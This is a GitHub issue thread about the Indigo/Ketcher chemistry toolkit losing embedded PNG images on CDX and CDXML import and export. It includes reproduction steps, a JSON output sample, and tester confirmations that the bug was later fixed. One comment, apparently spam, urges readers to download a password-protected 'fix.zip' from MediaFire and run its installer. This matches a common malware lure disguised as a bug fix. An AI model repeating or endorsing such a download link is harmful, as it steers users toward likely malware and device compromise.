### ISSUE TITLE
Preview: When importing and exporting to/from CDX and CDXML, images are lost

### ISSUE THREAD

**Issue by Zhirnoff** [epam/Indigo#2259]
**Summary**
When importing and exporting to/from CDX and CDXML, images are lost

**Steps to Reproduce**
**Case 1**
1. Add PNG Image [image-png.zip](https://github.com/user-attachments/files/16782000/image-png.2.zip) to canvas and Benzene ring
2. Save it to CDX and CDXML
3. Open in ChemDraw

**Case 2**
1. Add PNG Image to canvas and Benzene ring in ChemDraw
2. Save it to CDX and CDXML
3. Open in Ketcher

**Expected behavior**
When importing and exporting to/from CDX and CDXML, images are not lost

**Actual behavior**
When importing and exporting to/from CDX and CDXML, images are lost
Responce in Standalone with empty field "data:"
` {"root":{"nodes":[{"$ref":"mol0"},{"type":"image","format":"image/png","boundingBox":{"x":0.0,"y":-0.0,"z":0.0,"width":8.800000190734864,"height":4.050000190734863},"data":""}]},"mol0":{"type":"molecule","atoms":[{"label":"C","location":[0.5866667032241821,-5.050000190734863,0.0]},{"label":"C","location":[0.5866667032241821,-6.050000190734863,0.0]},{"label":"C","location":[1.5379999876022339,-6.359000205993652,0.0]},{"label":"C","location":[2.125666618347168,-5.550000190734863,0.0]},{"label":"C","location":[1.5379999876022339,-4.740999698638916,0.0]}],"bonds":[{"type":1,"atoms":[0,1]},{"type":1,"atoms":[1,2]},{"type":1,"atoms":[2,3]},{"type":1,"atoms":[3,4]},{"type":1,"atoms":[4,0]}]}}`

**Environment details:**
**Desktop:**
 - OS: Windows 11
 - Browser Chrome
 - Version 128.0.6613.85 (Official Build) (64-bit)

**Ketcher version** 
[Version 2.24.0-rc.1]
**Indigo version** 
[Version 1.24.0-dev.4]
Issue found when testing https://github.com/epam/Indigo/issues/2028

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zhirnoff** [comment]
Pretested. Bug not fixed for CDX. When opening CDX files saved in ChemDraw, images disappear, and ChemDraw can't open CDX files saved in Ketcher at all.
Test files saved in ChemDraw an in Ketcher: [testFiles.zip](https://github.com/user-attachments/files/16798748/testFiles.zip)

**Desktop:**
 - OS: Windows 11
 - Browser Chrome
 - Version 128.0.6613.85 (Official Build) (64-bit)

**Ketcher version** 
[Version 2.24.0-rc.1]
**Indigo version** 
[Version 1.24.0-dev.5]

**Comment by Zhirnoff** [comment]
Tested. Bug fixed. 
![2024-09-16_16h01_02](https://github.com/user-attachments/assets/e00ac3dd-10a4-474e-8697-b8f0491eced1)


**Desktop:**
 - OS: Windows 11
 - Browser Chrome
 - Version 128.0.6613.120 (Official Build) (64-bit)

**Ketcher version** 
[Version 2.25.0-rc.2]
**Indigo version** 
[Version 1.24.0-rc.2]
